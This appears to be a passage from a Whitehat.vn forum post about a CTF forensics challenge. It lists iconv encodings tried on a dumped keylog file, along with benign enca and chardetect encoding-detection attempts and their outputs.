                              120
                              121
                              122
                              123
                              124
                              125
                              126
                              127
                              128
                              129
                              130
                              131
                              132
                              133
                              134
                              135
                              136
                              137
                              138
                              139
                              140
                              141
                              142
                              143
                              144
                              145
                              146
                              147
                              148
                              149
                              150
                              151
                              152
                              153
                              154
                              155
                              156
                              157
                              158
                              159
                              160
                              161
                              162
                              163
                              164
                              165
                              166
                              167
                              168
                              169
                              170
                              171
                              172
                              173
                              174
                              175
                              176
                              177
                              178
                              179
                              180
                              181
                              182
                              183
                              184
                              185
                              186
                              187
                              188
                              189
                              190
                              191
                              192
                              193
                              194
                              195
                              196
                              197
                              198
                              199
                              200
                              201
                              202
                              203
                              204
                              205
                              206
                              207
                              208
                              209
                              210
                              211
                              212
                              213
                              214
                              215
                              216
                              217
                              218
                              219
                              220
                              221
                              222
                              223
                              224
                              225
                              226
                              227
                              228
                              229
                              230
                              231
                              232
                              233
                              234
                              235
                              236
                              237
                              238
                              239
                              240
                              241
                              242
                              243
                              244
                              245
                              246
                              247
                              248
                              249
                              250
                              251
                              252
                              253
                              254
                              255
                              256
                              257
                              258
                              259
                              260
                              261
                              262
                              263
                              264
                              265
                              266
                              267
                              268
                              269
                              270
                              271
                              272
                              273
                              274
                              275
                              276
                              277
                              278
                              279
                              280
                              281
                              282
                              283
                              284
                              285
                              286
                              287
                              288
                              289
                              290
                              291
                              292
                              293
                              294
                              295
                              296
                              297
                              298
                              299
                              300
                              301
                              302
                              303
                              304
                              305
                              306
                              307
                              308
                              309
                              310
                              311
                              312
                              313
                              314
                              315
                              316
                              317
                              318
                              319
                              320
                              321
                              322
                              323
                              324
                              325
                              326
                              327
                              328
                              329
                              330
                              331
                              332
                              333
                              334
                              335
                              336
                              337
                              338
                              339
                              340
                              341
                              342
                              343
                              344
                              345
                              346
                              347
                              348
                              349
                              350
                              351
                              352
                              353
                              354
                              355
                              356
                              357
                              358
                              359
                              360
                              361
                              362
                              363
                              364
                              365
                              366
                              367
                              368
                              369
                              370
                              371
                              372
                              373
                              374
                              375
                              376
                              377
                              378
                              379
                              380
                              381
                              382
                              383
                              384
                              385
                              386
                              387
                              388
                              389
                              390
                              391
                              392
                              393
                              394
                              395
                              396
                              397
                              398
                              399
                              400
                              401
                              402
                              403
                              404
                              405
                              406
                              407
                              408
                              409
                              410
                              411
                              412
                              413
                              414
                              415
                              416
                              417
                              418
                              419
                              420
                              421
                              422
                              423
                              424
                              425
                              426
                              427
                              428
                              429
                              430
                              431
                              432
                              433
                              434
                              435
                              436
                              437
                              438
                              439
                              440
                              441
                              442
                              443
                              444
                              445
                              446
                              447
                              448
                              449
                              450
                              451
                              452
                              453
                              454
                              455
                              456
                              457
                              458
                              459
                              460
                              461
                              462
                              463
                              464
                              465
                              466
                              467
                              468
                              469
                              470
                              471
                              472
                              473
                              474
                              475
                              476
                              477
                              478
                              479
                              480
                              481
                              482
                              483
                              484
                              485
                              486
                              487
                              488
                              489
                              490
                              491
                              492
                              493
                              494
                              1026 ok: 1026
                              1047 ok: 1047
                              437 ok: 437
                              500 ok: 500
                              500V1 ok: 500V1
                              850 ok: 850
                              851 ok: 851
                              852 ok: 852
                              855 ok: 855
                              860 ok: 860
                              861 ok: 861
                              862 ok: 862
                              863 ok: 863
                              865 ok: 865
                              866 ok: 866
                              866NAV ok: 866NAV
                              8859_1 ok: 8859_1
                              8859_2 ok: 8859_2
                              8859_4 ok: 8859_4
                              8859_5 ok: 8859_5
                              8859_9 ok: 8859_9
                              BALTIC ok: BALTIC
                              CP037 ok: CP037
                              CP10007 ok: CP10007
                              CP1025 ok: CP1025
                              CP1026 ok: CP1026
                              CP1047 ok: CP1047
                              CP1070 ok: CP1070
                              CP1079 ok: CP1079
                              CP1081 ok: CP1081
                              CP1084 ok: CP1084
                              CP1097 ok: CP1097
                              CP1112 ok: CP1112
                              CP1122 ok: CP1122
                              CP1123 ok: CP1123
                              CP1124 ok: CP1124
                              CP1125 ok: CP1125
                              CP1129 ok: CP1129
                              CP1130 ok: CP1130
                              CP1137 ok: CP1137
                              CP1140 ok: CP1140
                              CP1141 ok: CP1141
                              CP1142 ok: CP1142
                              CP1143 ok: CP1143
                              CP1144 ok: CP1144
                              CP1145 ok: CP1145
                              CP1146 ok: CP1146
                              CP1147 ok: CP1147
                              CP1148 ok: CP1148
                              CP1149 ok: CP1149
                              CP1153 ok: CP1153
                              CP1154 ok: CP1154
                              CP1155 ok: CP1155
                              CP1156 ok: CP1156
                              CP1157 ok: CP1157
                              CP1158 ok: CP1158
                              CP1160 ok: CP1160
                              CP1163 ok: CP1163
                              CP1164 ok: CP1164
                              CP1166 ok: CP1166
                              CP1167 ok: CP1167
                              CP1251 ok: CP1251
                              CP1256 ok: CP1256
                              CP1282 ok: CP1282
                              CP1390 ok: CP1390
                              CP1399 ok: CP1399
                              CP273 ok: CP273
                              CP278 ok: CP278
                              CP280 ok: CP280
                              CP282 ok: CP282
                              CP284 ok: CP284
                              CP285 ok: CP285
                              CP297 ok: CP297
                              CP437 ok: CP437
                              CP500 ok: CP500
                              CP5347 ok: CP5347
                              CP737 ok: CP737
                              CP770 ok: CP770
                              CP771 ok: CP771
                              CP772 ok: CP772
                              CP773 ok: CP773
                              CP774 ok: CP774
                              CP775 ok: CP775
                              CP819 ok: CP819
                              CP850 ok: CP850
                              CP851 ok: CP851
                              CP852 ok: CP852
                              CP855 ok: CP855
                              CP860 ok: CP860
                              CP861 ok: CP861
                              CP862 ok: CP862
                              CP863 ok: CP863
                              CP865 ok: CP865
                              CP866 ok: CP866
                              CP866NAV ok: CP866NAV
                              CP870 ok: CP870
                              CP871 ok: CP871
                              CP880 ok: CP880
                              CP901 ok: CP901
                              CP902 ok: CP902
                              CP9030 ok: CP9030
                              CP912 ok: CP912
                              CP915 ok: CP915
                              CP920 ok: CP920
                              CP921 ok: CP921
                              CP922 ok: CP922
                              CP9448 ok: CP9448
                              CP-HU ok: CP-HU
                              CPIBM861 ok: CPIBM861
                              CSIBM037 ok: CSIBM037
                              CSIBM1025 ok: CSIBM1025
                              CSIBM1026 ok: CSIBM1026
                              CSIBM1097 ok: CSIBM1097
                              CSIBM1112 ok: CSIBM1112
                              CSIBM1122 ok: CSIBM1122
                              CSIBM1123 ok: CSIBM1123
                              CSIBM1124 ok: CSIBM1124
                              CSIBM1129 ok: CSIBM1129
                              CSIBM1130 ok: CSIBM1130
                              CSIBM1137 ok: CSIBM1137
                              CSIBM1140 ok: CSIBM1140
                              CSIBM1141 ok: CSIBM1141
                              CSIBM1142 ok: CSIBM1142
                              CSIBM1143 ok: CSIBM1143
                              CSIBM1144 ok: CSIBM1144
                              CSIBM1145 ok: CSIBM1145
                              CSIBM1146 ok: CSIBM1146
                              CSIBM1147 ok: CSIBM1147
                              CSIBM1148 ok: CSIBM1148
                              CSIBM1149 ok: CSIBM1149
                              CSIBM1153 ok: CSIBM1153
                              CSIBM1154 ok: CSIBM1154
                              CSIBM1155 ok: CSIBM1155
                              CSIBM1156 ok: CSIBM1156
                              CSIBM1157 ok: CSIBM1157
                              CSIBM1158 ok: CSIBM1158
                              CSIBM1160 ok: CSIBM1160
                              CSIBM1163 ok: CSIBM1163
                              CSIBM1164 ok: CSIBM1164
                              CSIBM1166 ok: CSIBM1166
                              CSIBM1167 ok: CSIBM1167
                              CSIBM1390 ok: CSIBM1390
                              CSIBM1399 ok: CSIBM1399
                              CSIBM273 ok: CSIBM273
                              CSIBM277 ok: CSIBM277
                              CSIBM278 ok: CSIBM278
                              CSIBM280 ok: CSIBM280
                              CSIBM284 ok: CSIBM284
                              CSIBM285 ok: CSIBM285
                              CSIBM297 ok: CSIBM297
                              CSIBM500 ok: CSIBM500
                              CSIBM5347 ok: CSIBM5347
                              CSIBM851 ok: CSIBM851
                              CSIBM855 ok: CSIBM855
                              CSIBM860 ok: CSIBM860
                              CSIBM863 ok: CSIBM863
                              CSIBM865 ok: CSIBM865
                              CSIBM866 ok: CSIBM866
                              CSIBM870 ok: CSIBM870
                              CSIBM871 ok: CSIBM871
                              CSIBM880 ok: CSIBM880
                              CSIBM901 ok: CSIBM901
                              CSIBM902 ok: CSIBM902
                              CSIBM9030 ok: CSIBM9030
                              CSIBM921 ok: CSIBM921
                              CSIBM922 ok: CSIBM922
                              CSIBM9448 ok: CSIBM9448
                              CSISO111ECMACYRILLIC ok: CSISO111ECMACYRILLIC
                              CSISO139CSN369103 ok: CSISO139CSN369103
                              CSISO143IECP271 ok: CSISO143IECP271
                              CSISOLATIN1 ok: CSISOLATIN1
                              CSISOLATIN2 ok: CSISOLATIN2
                              CSISOLATIN4 ok: CSISOLATIN4
                              CSISOLATIN5 ok: CSISOLATIN5
                              CSISOLATIN6 ok: CSISOLATIN6
                              CSISOLATINCYRILLIC ok: CSISOLATINCYRILLIC
                              CSKOI8R ok: CSKOI8R
                              CSMACINTOSH ok: CSMACINTOSH
                              CSN_369103 ok: CSN_369103
                              CSPC775BALTIC ok: CSPC775BALTIC
                              CSPC850MULTILINGUAL ok: CSPC850MULTILINGUAL
                              CSPC862LATINHEBREW ok: CSPC862LATINHEBREW
                              CSPC8CODEPAGE437 ok: CSPC8CODEPAGE437
                              CSPCP852 ok: CSPCP852
                              CSUNICODE ok: CSUNICODE
                              CWI ok: CWI
                              CWI-2 ok: CWI-2
                              CYRILLIC ok: CYRILLIC
                              EBCDIC-CP-BE ok: EBCDIC-CP-BE
                              EBCDIC-CP-CA ok: EBCDIC-CP-CA
                              EBCDIC-CP-CH ok: EBCDIC-CP-CH
                              EBCDIC-CP-DK ok: EBCDIC-CP-DK
                              EBCDIC-CP-ES ok: EBCDIC-CP-ES
                              EBCDIC-CP-FI ok: EBCDIC-CP-FI
                              EBCDIC-CP-FR ok: EBCDIC-CP-FR
                              EBCDIC-CP-GB ok: EBCDIC-CP-GB
                              EBCDIC-CP-IS ok: EBCDIC-CP-IS
                              EBCDIC-CP-IT ok: EBCDIC-CP-IT
                              EBCDIC-CP-NL ok: EBCDIC-CP-NL
                              EBCDIC-CP-NO ok: EBCDIC-CP-NO
                              EBCDIC-CP-ROECE ok: EBCDIC-CP-ROECE
                              EBCDIC-CP-SE ok: EBCDIC-CP-SE
                              EBCDIC-CP-US ok: EBCDIC-CP-US
                              EBCDIC-CP-WT ok: EBCDIC-CP-WT
                              EBCDIC-CP-YU ok: EBCDIC-CP-YU
                              EBCDIC-CYRILLIC ok: EBCDIC-CYRILLIC
                              EBCDIC-INT1 ok: EBCDIC-INT1
                              ECMA-128 ok: ECMA-128
                              ECMACYRILLIC ok: ECMACYRILLIC
                              ECMA-CYRILLIC ok: ECMA-CYRILLIC
                              GEORGIAN-ACADEMY ok: GEORGIAN-ACADEMY
                              GEORGIAN-PS ok: GEORGIAN-PS
                              IBM037 ok: IBM037
                              IBM1025 ok: IBM1025
                              IBM-1025 ok: IBM-1025
                              IBM1026 ok: IBM1026
                              IBM1047 ok: IBM1047
                              IBM-1047 ok: IBM-1047
                              IBM1097 ok: IBM1097
                              IBM-1097 ok: IBM-1097
                              IBM1112 ok: IBM1112
                              IBM-1112 ok: IBM-1112
                              IBM1122 ok: IBM1122
                              IBM-1122 ok: IBM-1122
                              IBM1123 ok: IBM1123
                              IBM-1123 ok: IBM-1123
                              IBM1124 ok: IBM1124
                              IBM-1124 ok: IBM-1124
                              IBM1129 ok: IBM1129
                              IBM-1129 ok: IBM-1129
                              IBM1130 ok: IBM1130
                              IBM-1130 ok: IBM-1130
                              IBM1137 ok: IBM1137
                              IBM-1137 ok: IBM-1137
                              IBM1140 ok: IBM1140
                              IBM-1140 ok: IBM-1140
                              IBM1141 ok: IBM1141
                              IBM-1141 ok: IBM-1141
                              IBM1142 ok: IBM1142
                              IBM-1142 ok: IBM-1142
                              IBM1143 ok: IBM1143
                              IBM-1143 ok: IBM-1143
                              IBM1144 ok: IBM1144
                              IBM-1144 ok: IBM-1144
                              IBM1145 ok: IBM1145
                              IBM-1145 ok: IBM-1145
                              IBM1146 ok: IBM1146
                              IBM-1146 ok: IBM-1146
                              IBM1147 ok: IBM1147
                              IBM-1147 ok: IBM-1147
                              IBM1148 ok: IBM1148
                              IBM-1148 ok: IBM-1148
                              IBM1149 ok: IBM1149
                              IBM-1149 ok: IBM-1149
                              IBM1153 ok: IBM1153
                              IBM-1153 ok: IBM-1153
                              IBM1154 ok: IBM1154
                              IBM-1154 ok: IBM-1154
                              IBM1155 ok: IBM1155
                              IBM-1155 ok: IBM-1155
                              IBM1156 ok: IBM1156
                              IBM-1156 ok: IBM-1156
                              IBM1157 ok: IBM1157
                              IBM-1157 ok: IBM-1157
                              IBM1158 ok: IBM1158
                              IBM-1158 ok: IBM-1158
                              IBM1160 ok: IBM1160
                              IBM-1160 ok: IBM-1160
                              IBM1163 ok: IBM1163
                              IBM-1163 ok: IBM-1163
                              IBM1164 ok: IBM1164
                              IBM-1164 ok: IBM-1164
                              IBM1166 ok: IBM1166
                              IBM-1166 ok: IBM-1166
                              IBM1167 ok: IBM1167
                              IBM-1167 ok: IBM-1167
                              IBM1390 ok: IBM1390
                              IBM-1390 ok: IBM-1390
                              IBM1399 ok: IBM1399
                              IBM-1399 ok: IBM-1399
                              IBM256 ok: IBM256
                              IBM273 ok: IBM273
                              IBM277 ok: IBM277
                              IBM278 ok: IBM278
                              IBM280 ok: IBM280
                              IBM284 ok: IBM284
                              IBM285 ok: IBM285
                              IBM297 ok: IBM297
                              IBM437 ok: IBM437
                              IBM500 ok: IBM500
                              IBM5347 ok: IBM5347
                              IBM-5347 ok: IBM-5347
                              IBM775 ok: IBM775
                              IBM819 ok: IBM819
                              IBM848 ok: IBM848
                              IBM850 ok: IBM850
                              IBM851 ok: IBM851
                              IBM852 ok: IBM852
                              IBM855 ok: IBM855
                              IBM860 ok: IBM860
                              IBM861 ok: IBM861
                              IBM862 ok: IBM862
                              IBM863 ok: IBM863
                              IBM865 ok: IBM865
                              IBM866 ok: IBM866
                              IBM866NAV ok: IBM866NAV
                              IBM870 ok: IBM870
                              IBM871 ok: IBM871
                              IBM880 ok: IBM880
                              IBM901 ok: IBM901
                              IBM-901 ok: IBM-901
                              IBM902 ok: IBM902
                              IBM-902 ok: IBM-902
                              IBM9030 ok: IBM9030
                              IBM-9030 ok: IBM-9030
                              IBM912 ok: IBM912
                              IBM915 ok: IBM915
                              IBM920 ok: IBM920
                              IBM921 ok: IBM921
                              IBM-921 ok: IBM-921
                              IBM922 ok: IBM922
                              IBM-922 ok: IBM-922
                              IBM9448 ok: IBM9448
                              IBM-9448 ok: IBM-9448
                              IEC_P271 ok: IEC_P271
                              IEC_P27-1 ok: IEC_P27-1
                              ISO-10646/UCS2/ ok: ISO-10646/UCS2/
                              ISO_11548-1 ok: ISO_11548-1
                              ISO11548-1 ok: ISO11548-1
                              ISO6937 ok: ISO6937
                              ISO_6937 ok: ISO_6937
                              ISO_6937:1992 ok: ISO_6937:1992
                              ISO88591 ok: ISO88591
                              ISO_8859-1 ok: ISO_8859-1
                              ISO-8859-1 ok: ISO-8859-1
                              ISO8859-1 ok: ISO8859-1
                              ISO885910 ok: ISO885910
                              ISO_8859-10 ok: ISO_8859-10
                              ISO-8859-10 ok: ISO-8859-10
                              ISO8859-10 ok: ISO8859-10
                              ISO_8859-10:1992 ok: ISO_8859-10:1992
                              ISO_8859-1:1987 ok: ISO_8859-1:1987
                              ISO885913 ok: ISO885913
                              ISO-8859-13 ok: ISO-8859-13
                              ISO8859-13 ok: ISO8859-13
                              ISO885914 ok: ISO885914
                              ISO_8859-14 ok: ISO_8859-14
                              ISO-8859-14 ok: ISO-8859-14
                              ISO8859-14 ok: ISO8859-14
                              ISO_8859-14:1998 ok: ISO_8859-14:1998
                              ISO885915 ok: ISO885915
                              ISO_8859-15 ok: ISO_8859-15
                              ISO-8859-15 ok: ISO-8859-15
                              ISO8859-15 ok: ISO8859-15
                              ISO_8859-15:1998 ok: ISO_8859-15:1998
                              ISO885916 ok: ISO885916
                              ISO_8859-16 ok: ISO_8859-16
                              ISO-8859-16 ok: ISO-8859-16
                              ISO8859-16 ok: ISO8859-16
                              ISO_8859-16:2001 ok: ISO_8859-16:2001
                              ISO88592 ok: ISO88592
                              ISO_8859-2 ok: ISO_8859-2
                              ISO-8859-2 ok: ISO-8859-2
                              ISO8859-2 ok: ISO8859-2
                              ISO_8859-2:1987 ok: ISO_8859-2:1987
                              ISO88594 ok: ISO88594
                              ISO_8859-4 ok: ISO_8859-4
                              ISO-8859-4 ok: ISO-8859-4
                              ISO8859-4 ok: ISO8859-4
                              ISO_8859-4:1988 ok: ISO_8859-4:1988
                              ISO88595 ok: ISO88595
                              ISO_8859-5 ok: ISO_8859-5
                              ISO-8859-5 ok: ISO-8859-5
                              ISO8859-5 ok: ISO8859-5
                              ISO_8859-5:1988 ok: ISO_8859-5:1988
                              ISO88599 ok: ISO88599
                              ISO_8859-9 ok: ISO_8859-9
                              ISO-8859-9 ok: ISO-8859-9
                              ISO8859-9 ok: ISO8859-9
                              ISO_8859-9:1989 ok: ISO_8859-9:1989
                              ISO88599E ok: ISO88599E
                              ISO_8859-9E ok: ISO_8859-9E
                              ISO-8859-9E ok: ISO-8859-9E
                              ISO8859-9E ok: ISO8859-9E
                              ISO-CELTIC ok: ISO-CELTIC
                              ISO-IR-100 ok: ISO-IR-100
                              ISO-IR-101 ok: ISO-IR-101
                              ISO-IR-110 ok: ISO-IR-110
                              ISO-IR-111 ok: ISO-IR-111
                              ISO-IR-139 ok: ISO-IR-139
                              ISO-IR-143 ok: ISO-IR-143
                              ISO-IR-144 ok: ISO-IR-144
                              ISO-IR-148 ok: ISO-IR-148
                              ISO-IR-156 ok: ISO-IR-156
                              ISO-IR-157 ok: ISO-IR-157
                              ISO-IR-179 ok: ISO-IR-179
                              ISO-IR-199 ok: ISO-IR-199
                              ISO-IR-203 ok: ISO-IR-203
                              ISO-IR-226 ok: ISO-IR-226
                              ISO/TR_11548-1/ ok: ISO/TR_11548-1/
                              KOI8R ok: KOI8R
                              KOI8-R ok: KOI8-R
                              KOI8-RU ok: KOI8-RU
                              KOI8U ok: KOI8U
                              KOI8-U ok: KOI8-U
                              L1 ok: L1
                              L10 ok: L10
                              L2 ok: L2
                              L4 ok: L4
                              L5 ok: L5
                              L6 ok: L6
                              L7 ok: L7
                              L8 ok: L8
                              LATIN1 ok: LATIN1
                              LATIN10 ok: LATIN10
                              LATIN2 ok: LATIN2
                              LATIN4 ok: LATIN4
                              LATIN5 ok: LATIN5
                              LATIN6 ok: LATIN6
                              LATIN7 ok: LATIN7
                              LATIN8 ok: LATIN8
                              LATIN9 ok: LATIN9
                              LATIN-9 ok: LATIN-9
                              MAC ok: MAC
                              MAC-CENTRALEUROPE ok: MAC-CENTRALEUROPE
                              MACCYRILLIC ok: MACCYRILLIC
                              MAC-CYRILLIC ok: MAC-CYRILLIC
                              MACINTOSH ok: MACINTOSH
                              MACIS ok: MACIS
                              MAC-IS ok: MAC-IS
                              MAC-SAMI ok: MAC-SAMI
                              MACUK ok: MACUK
                              MAC-UK ok: MAC-UK
                              MACUKRAINIAN ok: MACUKRAINIAN
                              MIK ok: MIK
                              MS-ARAB ok: MS-ARAB
                              MS-CYRL ok: MS-CYRL
                              MSMACCYRILLIC ok: MSMACCYRILLIC
                              MS-MAC-CYRILLIC ok: MS-MAC-CYRILLIC
                              OSF00010001 ok: OSF00010001
                              OSF00010002 ok: OSF00010002
                              OSF00010004 ok: OSF00010004
                              OSF00010005 ok: OSF00010005
                              OSF00010009 ok: OSF00010009
                              OSF0001000A ok: OSF0001000A
                              OSF00010100 ok: OSF00010100
                              OSF00010101 ok: OSF00010101
                              OSF00010102 ok: OSF00010102
                              OSF10020025 ok: OSF10020025
                              OSF10020111 ok: OSF10020111
                              OSF10020115 ok: OSF10020115
                              OSF10020116 ok: OSF10020116
                              OSF10020118 ok: OSF10020118
                              OSF1002011C ok: OSF1002011C
                              OSF1002011D ok: OSF1002011D
                              OSF10020129 ok: OSF10020129
                              OSF100201B5 ok: OSF100201B5
                              OSF100201F4 ok: OSF100201F4
                              OSF10020352 ok: OSF10020352
                              OSF10020354 ok: OSF10020354
                              OSF10020357 ok: OSF10020357
                              OSF1002035D ok: OSF1002035D
                              OSF1002035E ok: OSF1002035E
                              OSF1002035F ok: OSF1002035F
                              OSF10020366 ok: OSF10020366
                              OSF10020367 ok: OSF10020367
                              OSF10020370 ok: OSF10020370
                              OSF10020402 ok: OSF10020402
                              OSF10020417 ok: OSF10020417
                              PT154 ok: PT154
                              RK1048 ok: RK1048
                              RUSCII ok: RUSCII
                              STRK1048-2002 ok: STRK1048-2002
                              TCVN ok: TCVN
                              TCVN-5712 ok: TCVN-5712
                              TCVN5712-1 ok: TCVN5712-1
                              TCVN5712-1:1993 ok: TCVN5712-1:1993
                              TS-5881 ok: TS-5881
                              UCS2 ok: UCS2
                              UCS-2 ok: UCS-2
                              UCS-2BE ok: UCS-2BE
                              UCS-2LE ok: UCS-2LE
                              UNICODE ok: UNICODE
                              UNICODEBIG ok: UNICODEBIG
                              UNICODELITTLE ok: UNICODELITTLE
                              UTF16 ok: UTF16
                              UTF-16 ok: UTF-16
                              UTF16BE ok: UTF16BE
                              UTF-16BE ok: UTF-16BE
                              UTF16LE ok: UTF16LE
                              UTF-16LE ok: UTF-16LE
                              VISCII ok: VISCII
                              WINDOWS-1251 ok: WINDOWS-1251
                              WINDOWS-1256 ok: WINDOWS-1256
                              • Tried UTF-16, UNICODELITTLE, UNICODE, LATIN1, ISO-8859-1 WINDOWS-1251, CP1251 with iconv.
                              • Tried enca recognition:
                                1
                                2
                                3
                                4
                                5
                                6
                                [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                                $ enca -f keylog.log_file.None.0x80eb7008.dat
                                enca: Cannot determine (or understand) your language preferences.
                                Please use `-L language', or `-L none' if your language is not supported
                                (only a few multibyte encodings can be recognized then).
                                Run `enca --list languages' to get a list of supported languages.
                              • Tried chardet (not even a relevent output):
                              1
                              2
                              3
                              [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2]
                              $ chardetect keylog.log_file.None.0x80eb7008.dat
                              keylog.log_file.None.0x80eb7008.dat: windows-1253 with confidence 0.3253156807138245
                              Submit

                              Whitehat.vn

                              Comment

                              Bạn cần đăng nhập hoặc đăng ký để viết bài
                              Đăng nhập/Đăng ký
                              Previously entered content was automatically saved. Restore or Discard.
                              Auto-Saved
                              x
                              x
                              Mời bạn bấm like để theo dõi Whitehat forum trên Facebook